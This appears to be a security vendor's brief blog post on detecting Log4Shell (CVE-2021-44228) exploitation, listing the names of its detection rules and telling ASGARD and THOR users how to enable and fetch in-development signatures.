The Log4Shell vulnerability (CVE-2021-44228) in log4j is actively exploited in-the-wild and highly critical. This blog posts lists some important web resources and the signatures that detect exploitation attempts.
Signatures Detecting Log4Shell Attacks
Check for matches with the following rules:
- Log4j RCE CVE-2021-44228 in Fields
- Log4j RCE CVE-2021-44228 Generic
- JNDIExploit Kit Pattern
Look for matches with the following rules that trigger on activity observer in-the-wild.
- Suspicious Activity in Shell Commands
It takes us few days to release new rules. The rules that we wrote over the weekend may not be available on Monday 13th of December. ASGARD users that want to use the signatures that are still in our QS, can activate the option for these signatures in “Settings > Advanced > Show Signature SigDev Option”.
After changing the setting, new scans show an additional option in the dropdown menu.
Please contact our support in case of any questions.
Users of our scanner THOR also need to use the signature version that’s in development to get the newest signatures that detect log4j exploitation.
Retrieve that signature pack with:
thor-util.exe update –sigdev